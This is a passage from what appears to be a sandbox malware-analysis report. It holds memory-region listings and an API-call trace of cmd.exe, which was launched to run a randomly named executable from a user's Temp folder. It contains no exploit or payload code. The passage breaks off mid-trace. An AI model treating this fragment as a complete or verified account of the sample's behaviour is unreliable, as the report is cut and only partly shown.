0xc9e4c70000 end_va = 0xc9e4c73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c9e4c70000" filename = "" Region: id = 210 start_va = 0xc9e63c0000 end_va = 0xc9e64c8fff entry_point = 0x0 region_type = private name = "private_0x000000c9e63c0000" filename = "" Region: id = 211 start_va = 0xc9e6530000 end_va = 0xc9e6642fff entry_point = 0x0 region_type = private name = "private_0x000000c9e6530000" filename = "" Region: id = 212 start_va = 0xc9e66f0000 end_va = 0xc9e66fffff entry_point = 0x0 region_type = private name = "private_0x000000c9e66f0000" filename = "" Region: id = 213 start_va = 0xc9e6700000 end_va = 0xc9e6a36fff entry_point = 0xc9e6700000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 214 start_va = 0xc9e6a40000 end_va = 0xc9e6c5bfff entry_point = 0x0 region_type = private name = "private_0x000000c9e6a40000" filename = "" Region: id = 215 start_va = 0xc9e6c60000 end_va = 0xc9e6e75fff entry_point = 0x0 region_type = private name = "private_0x000000c9e6c60000" filename = "" Region: id = 216 start_va = 0xc9e6e80000 end_va = 0xc9e7093fff entry_point = 0x0 region_type = private name = "private_0x000000c9e6e80000" filename = "" Region: id = 217 start_va = 0x7ff79d88e000 end_va = 0x7ff79d88ffff entry_point = 0x0 region_type = private name = "private_0x00007ff79d88e000" filename = "" Region: id = 218 start_va = 0x7ffb37f40000 end_va = 0x7ffb37f61fff entry_point = 0x7ffb37f40000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 219 start_va = 0x7ffb37a60000 end_va = 0x7ffb37a72fff entry_point = 0x7ffb37a60000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 220 start_va = 0x7ffb391c0000 end_va = 0x7ffb39217fff entry_point = 0x7ffb391c0000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 221 start_va = 0xc9e4c80000 end_va = 0xc9e4c86fff entry_point = 0x0 region_type = private name = "private_0x000000c9e4c80000" filename = "" Region: id = 222 start_va = 0xc9e64d0000 end_va = 0xc9e64d4fff entry_point = 0xc9e64d0000 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 223 start_va = 0xc9e64e0000 end_va = 0xc9e64e0fff entry_point = 0xc9e64e0000 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 224 start_va = 0xc9e64f0000 end_va = 0xc9e64f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c9e64f0000" filename = "" Region: id = 225 start_va = 0xc9e70a0000 end_va = 0xc9e7295fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c9e70a0000" filename = "" Region: id = 226 start_va = 0x7ffb34cc0000 end_va = 0x7ffb34f33fff entry_point = 0x7ffb34cc0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll") Region: id = 227 start_va = 0xc9e6500000 end_va = 0xc9e6500fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c9e6500000" filename = "" Region: id = 228 start_va = 0xc9e6510000 end_va = 0xc9e6511fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c9e6510000" filename = "" Region: id = 229 start_va = 0x7ffb39b90000 end_va = 0x7ffb39bfafff entry_point = 0x7ffb39b90000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Thread: id = 2 os_tid = 0xeac Thread: id = 3 os_tid = 0xebc Thread: id = 4 os_tid = 0xec4 Thread: id = 5 os_tid = 0xed0 Thread: id = 14 os_tid = 0xf28 Process: id = "3" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x6fbb3000" os_pid = "0xf8c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xe98" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c call \"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vwOrbzLbc.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013d92" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 379 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 380 start_va = 0x4bba090000 end_va = 0x4bba0affff entry_point = 0x0 region_type = private name = "private_0x0000004bba090000" filename = "" Region: id = 381 start_va = 0x4bba0b0000 end_va = 0x4bba0c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004bba0b0000" filename = "" Region: id = 382 start_va = 0x4bba0d0000 end_va = 0x4bba1cffff entry_point = 0x0 region_type = private name = "private_0x0000004bba0d0000" filename = "" Region: id = 383 start_va = 0x4bba1d0000 end_va = 0x4bba1d3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004bba1d0000" filename = "" Region: id = 384 start_va = 0x4bba1e0000 end_va = 0x4bba1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004bba1e0000" filename = "" Region: id = 385 start_va = 0x4bba1f0000 end_va = 0x4bba1f1fff entry_point = 0x0 region_type = private name = "private_0x0000004bba1f0000" filename = "" Region: id = 386 start_va = 0x7df5ff7b0000 end_va = 0x7ff5ff7affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff7b0000" filename = "" Region: id = 387 start_va = 0x7ff6de390000 end_va = 0x7ff6de3b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6de390000" filename = "" Region: id = 388 start_va = 0x7ff6de3b8000 end_va = 0x7ff6de3b8fff entry_point = 0x0 region_type = private name = "private_0x00007ff6de3b8000" filename = "" Region: id = 389 start_va = 0x7ff6de3be000 end_va = 0x7ff6de3bffff entry_point = 0x0 region_type = private name = "private_0x00007ff6de3be000" filename = "" Region: id = 390 start_va = 0x7ff6decd0000 end_va = 0x7ff6ded28fff entry_point = 0x7ff6decd0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 391 start_va = 0x7ffb3d310000 end_va = 0x7ffb3d4d1fff entry_point = 0x7ffb3d310000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 392 start_va = 0x4bba220000 end_va = 0x4bba31ffff entry_point = 0x0 region_type = private name = "private_0x0000004bba220000" filename = "" Region: id = 393 start_va = 0x7ffb3a800000 end_va = 0x7ffb3a9dcfff entry_point = 0x7ffb3a800000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 394 start_va = 0x7ffb3d260000 end_va = 0x7ffb3d30cfff entry_point = 0x7ffb3d260000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 434 start_va = 0x4bba090000 end_va = 0x4bba09ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004bba090000" filename = "" Region: id = 435 start_va = 0x4bba0a0000 end_va = 0x4bba0a6fff entry_point = 0x0 region_type = private name = "private_0x0000004bba0a0000" filename = "" Region: id = 436 start_va = 0x4bba320000 end_va = 0x4bba3ddfff entry_point = 0x4bba320000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 437 start_va = 0x4bba3e0000 end_va = 0x4bba4dffff entry_point = 0x0 region_type = private name = "private_0x0000004bba3e0000" filename = "" Region: id = 438 start_va = 0x4bba5f0000 end_va = 0x4bba5fffff entry_point = 0x0 region_type = private name = "private_0x0000004bba5f0000" filename = "" Region: id = 439 start_va = 0x7ff6de290000 end_va = 0x7ff6de38ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6de290000" filename = "" Region: id = 440 start_va = 0x7ff6de3bc000 end_va = 0x7ff6de3bdfff entry_point = 0x0 region_type = private name = "private_0x00007ff6de3bc000" filename = "" Region: id = 441 start_va = 0x7ffb3cf10000 end_va = 0x7ffb3cfacfff entry_point = 0x7ffb3cf10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 442 start_va = 0x4bba200000 end_va = 0x4bba206fff entry_point = 0x0 region_type = private name = "private_0x0000004bba200000" filename = "" Region: id = 443 start_va = 0x4bba600000 end_va = 0x4bba936fff entry_point = 0x4bba600000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 444 start_va = 0x7ffb38570000 end_va = 0x7ffb385e7fff entry_point = 0x7ffb38570000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 462 start_va = 0x7ff6ddf00000 end_va = 0x7ff6de28ffff entry_point = 0x7ff6ddf00000 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Thread: id = 16 os_tid = 0xf90 [0025.528] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff6decd0000 [0025.528] __set_app_type (_Type=0x1) [0025.528] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff6dece44a0) returned 0x0 [0025.528] __getmainargs (in: _Argc=0x7ff6decff0e8, _Argv=0x7ff6decff0f0, _Env=0x7ff6decff0f8, _DoWildCard=0, _StartInfo=0x7ff6decff104 | out: _Argc=0x7ff6decff0e8, _Argv=0x7ff6decff0f0, _Env=0x7ff6decff0f8) returned 0 [0025.529] GetCurrentThreadId () returned 0xf90 [0025.529] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf90) returned 0x6c [0025.529] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x7ffb3d260000 [0025.529] GetProcAddress (hModule=0x7ffb3d260000, lpProcName="SetThreadUILanguage") returned 0x7ffb3d27d550 [0025.529] SetThreadUILanguage (LangId=0x0) returned 0x409 [0025.531] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0025.531] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x4bba1cfcd8 | out: phkResult=0x4bba1cfcd8*=0x0) returned 0x2 [0025.531] VirtualQuery (in: lpAddress=0x4bba1cfcc4, lpBuffer=0x4bba1cfc40, dwLength=0x30 | out: lpBuffer=0x4bba1cfc40*(BaseAddress=0x4bba1cf000, AllocationBase=0x4bba0d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xffffd000)) returned 0x30 [0025.531] VirtualQuery (in: lpAddress=0x4bba0d0000, lpBuffer=0x4bba1cfc40, dwLength=0x30 | out: lpBuffer=0x4bba1cfc40*(BaseAddress=0x4bba0d0000, AllocationBase=0x4bba0d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0xffffd000)) returned 0x30 [0025.531] VirtualQuery (in: lpAddress=0x4bba0d1000, lpBuffer=0x4bba1cfc40, dwLength=0x30 | out: lpBuffer=0x4bba1cfc40*(BaseAddress=0x4bba0d1000, AllocationBase=0x4bba0d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0xffffd000)) returned 0x30 [0025.531] VirtualQuery (in: lpAddress=0x4bba0d4000, lpBuffer=0x4bba1cfc40, dwLength=0x30 | out: lpBuffer=0x4bba1cfc40*(BaseAddress=0x4bba0d4000, AllocationBase=0x4bba0d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xffffd000)) returned 0x30 [0025.531] VirtualQuery (in: lpAddress=0x4bba1d0000, lpBuffer=0x4bba1cfc40, dwLength=0x30 | out: lpBuffer=0x4bba1cfc40*(BaseAddress=0x4bba1d0000, AllocationBase=0x4bba1d0000, AllocationProtect=0x2, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000, __alignment2=0xffffd000)) returned 0x30 [0025.531] GetConsoleOutputCP () returned 0x1b5 [0025.532] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff6ded08640 | out: lpCPInfo=0x7ff6ded08640) returned 1 [0025.532] SetConsoleCtrlHandler (HandlerRoutine=0x7ff6decf15d0, Add=1) returned 1 [0025.532] _get_osfhandle (_FileHandle=1) returned 0x24 [0025.532] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x0) returned 1 [0025.532] _get_osfhandle (_FileHandle=1) returned 0x24 [0025.532] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff6ded085ec | out: lpMode=0x7ff6ded085ec) returned 1 [0025.532] _get_osfhandle (_FileHandle=1) returned 0x24 [0025.532] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x3) returned 1 [0025.533] _get_osfhandle (_FileHandle=0) returned 0x20 [0025.533] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff6ded085e8 | out: lpMode=0x7ff6ded085e8) returned 1 [0025.533] _get_osfhandle (_FileHandle=0) returned 0x20 [0025.533] SetConsoleMode (hConsoleHandle=0x20, dwMode=0x1e7) returned 1 [0025.533] GetEnvironmentStringsW () returned 0x4bba2252b0* [0025.534] FreeEnvironmentStringsA (penv="A") returned 1 [0025.534] GetEnvironmentStringsW () returned 0x4bba2252b0* [0025.534] FreeEnvironmentStringsA (penv="A") returned 1 [0025.534] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4bba1ceb88 | out: phkResult=0x4bba1ceb88*=0x78) returned 0x0 [0025.534] RegQueryValueExW (in: hKey=0x78, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4bba1ceb80, lpData=0x4bba1ceba0, lpcbData=0x4bba1ceb84*=0x1000 | out: lpType=0x4bba1ceb80*=0x0, lpData=0x4bba1ceba0*=0x1, lpcbData=0x4bba1ceb84*=0x1000) returned 0x2 [0025.534] RegQueryValueExW (in: hKey=0x78, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4bba1ceb80, lpData=0x4bba1ceba0, lpcbData=0x4bba1ceb84*=0x1000 | out: lpType=0x4bba1ceb80*=0x4, lpData=0x4bba1ceba0*=0x1, lpcbData=0x4bba1ceb84*=0x4) returned 0x0 [0025.534] RegQueryValueExW (in: hKey=0x78, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4bba1ceb80, lpData=0x4bba1ceba0, lpcbData=0x4bba1ceb84*=0x1000 | out: lpType=0x4bba1ceb80*=0x0, lpData=0x4bba1ceba0*=0x1, lpcbData=0x4bba1ceb84*=0x1000) returned 0x2 [0025.534] RegQueryValueExW (in: hKey=0x78, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4bba1ceb80, lpData=0x4bba1ceba0, lpcbData=0x4bba1ceb84*=0x1000 | out: lpType=0x4bba1ceb80*=0x4, lpData=0x4bba1ceba0*=0x0, lpcbData=0x4bba1ceb84*=0x4) returned 0x0 [0025.534] RegQueryValueExW (in: hKey=0x78, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4bba1ceb80, lpData=0x4bba1ceba0, lpcbData=0x4bba1ceb84*=0x1000 | out: lpType=0x4bba1ceb80*=0x4, lpData=0x4bba1ceba0*=0x40, lpcbData=0x4bba1ceb84*=0x4) returned 0x0 [0025.534] RegQueryValueExW (in: hKey=0x78, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4bba1ceb80, lpData=0x4bba1ceba0, lpcbData=0x4bba1ceb84*=0x1000 | out: lpType=0x4bba1ceb80*=0x4, lpData=0x4bba1ceba0*=0x40, lpcbData=0x4bba1ceb84*=0x4) returned 0x0 [0025.534] RegQueryValueExW (in: hKey=0x78, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4bba1ceb80, lpData=0x4bba1ceba0, lpcbData=0x4bba1ceb84*=0x1000 | out: lpType=0x4bba1ceb80*=0x0, lpData=0x4bba1ceba0*=0x40, lpcbData=0x4bba1ceb84*=0x1000) returned 0x2 [0025.534] RegCloseKey (hKey=0x78) returned 0x0 [0025.534] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4bba1ceb88 | out: phkResult=0x4bba1ceb88*=0x78) returned 0x0 [0025.535] RegQueryValueExW (in: hKey=0x78, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4bba1ceb80, lpData=0x4bba1ceba0, lpcbData=0x4bba1ceb84*=0x1000 | out: lpType=0x4bba1ceb80*=0x0, lpData=0x4bba1ceba0*=0x40, lpcbData=0x4bba1ceb84*=0x1000) returned 0x2 [0025.535] RegQueryValueExW (in: hKey=0x78, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4bba1ceb80, lpData=0x4bba1ceba0, lpcbData=0x4bba1ceb84*=0x1000 | out: lpType=0x4bba1ceb80*=0x4, lpData=0x4bba1ceba0*=0x1, lpcbData=0x4bba1ceb84*=0x4) returned 0x0 [0025.535] RegQueryValueExW (in: hKey=0x78, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4bba1ceb80, lpData=0x4bba1ceba0, lpcbData=0x4bba1ceb84*=0x1000 | out: lpType=0x4bba1ceb80*=0x0, lpData=0x4bba1ceba0*=0x1, lpcbData=0x4bba1ceb84*=0x1000) returned 0x2 [0025.535] RegQueryValueExW (in: hKey=0x78, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4bba1ceb80, lpData=0x4bba1ceba0, lpcbData=0x4bba1ceb84*=0x1000 | out: lpType=0x4bba1ceb80*=0x4, lpData=0x4bba1ceba0*=0x0, lpcbData=0x4bba1ceb84*=0x4) returned 0x0 [0025.535] RegQueryValueExW (in: hKey=0x78, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4bba1ceb80, lpData=0x4bba1ceba0, lpcbData=0x4bba1ceb84*=0x1000 | out: lpType=0x4bba1ceb80*=0x4, lpData=0x4bba1ceba0*=0x9, lpcbData=0x4bba1ceb84*=0x4) returned 0x0 [0025.535] RegQueryValueExW (in: hKey=0x78, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4bba1ceb80, lpData=0x4bba1ceba0, lpcbData=0x4bba1ceb84*=0x1000 | out: lpType=0x4bba1ceb80*=0x4, lpData=0x4bba1ceba0*=0x9, lpcbData=0x4bba1ceb84*=0x4) returned 0x0 [0025.535] RegQueryValueExW (in: hKey=0x78, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4bba1ceb80, lpData=0x4bba1ceba0, lpcbData=0x4bba1ceb84*=0x1000 | out: lpType=0x4bba1ceb80*=0x0, lpData=0x4bba1ceba0*=0x9, lpcbData=0x4bba1ceb84*=0x1000) returned 0x2 [0025.535] RegCloseKey (hKey=0x78) returned 0x0 [0025.535] time (in: timer=0x0 | out: timer=0x0) returned 0x5a26c1de [0025.535] srand (_Seed=0x5a26c1de) [0025.535] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c call \"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vwOrbzLbc.exe\"" [0025.535] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c call \"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vwOrbzLbc.exe\"" [0025.535] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x7ff6ded10920 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0025.535] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4bba2252c0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0025.535] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff6ded08680, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0025.535] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff6ded08680, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0025.535] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff6ded08680, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0025.535] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0025.535] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0025.535] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0025.535] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0025.535] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0025.535] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0025.535] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0025.535] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0025.536] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0025.536] GetEnvironmentStringsW () returned 0x4bba2254d0* [0025.536] FreeEnvironmentStringsA (penv="A") returned 1 [0025.536] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x7ff6ded08680, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0025.536] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x7ff6ded08680, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0025.536] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0025.536] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0025.536] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0025.536] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0025.536] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0025.536] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0025.536] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0025.536] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0025.536] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4bba1cf990 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0025.536] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x4bba1cf990, lpFilePart=0x4bba1cf970 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x4bba1cf970*="system32") returned 0x13 [0025.536] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0025.537] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x4bba1cf6a0 | out: lpFindFileData=0x4bba1cf6a0) returned 0x4bba220720 [0025.537] FindClose (in: hFindFile=0x4bba220720 | out: hFindFile=0x4bba220720) returned 1 [0025.537] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x4bba1cf6a0 | out: lpFindFileData=0x4bba1cf6a0) returned 0x4bba220720 [0025.538] FindClose (in: hFindFile=0x4bba220720 | out: hFindFile=0x4bba220720) returned 1 [0025.538] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0025.538] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0025.538] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0025.538] GetEnvironmentStringsW () returned 0x4bba227350* [0025.538] FreeEnvironmentStringsA (penv="=") returned 1 [0025.538] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x7ff6ded10920 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0025.566] GetConsoleOutputCP () returned 0x1b5 [0025.566] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff6ded08640 | out: lpCPInfo=0x7ff6ded08640) returned 1 [0025.566] GetUserDefaultLCID () returned 0x409 [0025.566] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x7ff6ded0c680, cchData=8 | out: lpLCData=":") returned 2 [0025.566] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x4bba1cfac0, cchData=128 | out: lpLCData="0") returned 2 [0025.566] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x4bba1cfac0, cchData=128 | out: lpLCData="0") returned 2 [0025.567] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x4bba1cfac0, cchData=128 | out: lpLCData="1") returned 2 [0025.567] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x7ff6ded0c690, cchData=8 | out: lpLCData="/") returned 2 [0025.567] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x7ff6ded0c6e0, cchData=32 | out: lpLCData="Mon") returned 4 [0025.567] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x7ff6ded0c720, cchData=32 | out: lpLCData="Tue") returned 4 [0025.567] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x7ff6ded0c760, cchData=32 | out: lpLCData="Wed") returned 4 [0025.567] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x7ff6ded0c7a0, cchData=32 | out: lpLCData="Thu") returned 4 [0025.567] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x7ff6ded0c7e0, cchData=32 | out: lpLCData="Fri") returned 4 [0025.567] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x7ff6ded0c820, cchData=32 | out: lpLCData="Sat") returned 4 [0025.567] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x7ff6ded0c860, cchData=32 | out: lpLCData="Sun") returned 4 [0025.567] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x7ff6ded0c6a0, cchData=8 | out: lpLCData=".") returned 2 [0025.567] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x7ff6ded0c6c0, cchData=8 | out: lpLCData=",") returned 2 [0025.567] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0025.568] GetConsoleTitleW (in: lpConsoleTitle=0x4bba221070, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0025.568] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x7ffb3d260000 [0025.568] GetProcAddress (hModule=0x7ffb3d260000, lpProcName="CopyFileExW") returned 0x7ffb3d2825e0 [0025.568] GetProcAddress (hModule=0x7ffb3d260000, lpProcName="IsDebuggerPresent") returned 0x7ffb3d281f90 [0025.568] GetProcAddress (hModule=0x7ffb3d260000, lpProcName="SetConsoleInputExeNameW") returned 0x7ffb3a853a10 [0025.569] _wcsicmp (_String1="call", _String2=")") returned 58 [0025.569] _wcsicmp (_String1="FOR", _String2="call") returned 3 [0025.569] _wcsicmp (_String1="FOR/?", _String2="call") returned 3 [0025.569] _wcsicmp (_String1="IF", _String2="call") returned 6 [0025.569] _wcsicmp (_String1="IF/?", _String2="call") returned 6 [0025.569] _wcsicmp (_String1="REM", _String2="call") returned 15 [0025.569] _wcsicmp (_String1="REM/?", _String2="call") returned 15 [0025.571] GetConsoleTitleW (in: lpConsoleTitle=0x4bba1cf9b0, nSize=0x104 